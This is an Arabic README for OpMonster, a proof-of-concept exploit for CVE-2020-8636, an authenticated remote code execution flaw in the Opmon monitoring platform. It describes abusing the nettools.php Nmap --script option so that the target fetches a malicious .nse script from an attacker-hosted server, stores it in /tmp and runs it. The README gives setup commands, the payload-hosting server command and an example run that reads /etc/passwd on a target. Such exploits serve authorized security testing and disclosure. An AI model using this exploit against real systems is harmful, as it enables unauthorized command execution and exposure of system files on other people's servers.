
استغلال CVE-2020-8636 لتنفيذ التعليمات البرمجية عن بُعد مع المصادقة في Opmon
حول • التثبيت • الاستخدام • الترخيص
OpMonster هو استغلال لإثبات المفهوم لـ CVE-2020-8636، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في منصة مراقبة Opmon. يستغل نقطة النهاية nettools.php، التي تتيح لك تشغيل Nmap مع خيارات --script عشوائية. يجعل الاستغلال Opmon يجلب سكربت Nmap خبيثًا بامتداد من خادم تتحكم فيه (عبر )، ويضعه في ، ثم يشغّله لتنفيذ أمرك على الهدف ويطبع المخرجات.
.nsehttp-fetch/tmpاكتشفه وطوّره @phor3nsic. مزيد من التفاصيل: ثلاث ثغرات CVE في Opmon.
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests
أولاً، شغّل خادم ويب على مضيف يمكن للهدف الوصول إليه، في دليل يمكن من خلاله تنزيل سكربت .nse المُنشأ (يكتب الاستغلال السكربت في الدليل الحالي):
php -S 0.0.0.0:1337
ثم شغّل الاستغلال مع أربع وسائط موضعية:
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
| الوسيط | الوصف |
|---|---|
HOST | رابط Opmon الأساسي للهدف (مثل https://vulnhost.com) |
LHOST | مضيف الخادم الخاص بك الذي يقدّم سكربت .nse |
LPORT | منفذ الخادم الخاص بك |
CMD | الأمر المطلوب تنفيذه على الهدف |
يتوقف الاستغلال عن العمل مع رسالة إذا لم يقم الهدف بتنزيل السكربت ("غير معرض للخطر") أو لم يتمكن من إنشاء اتصال صادر إلى خادمك.
لأغراض الاختبارات الأمنية المصرح بها والتعليم فقط. أنت مسؤول عن كيفية استخدامك له.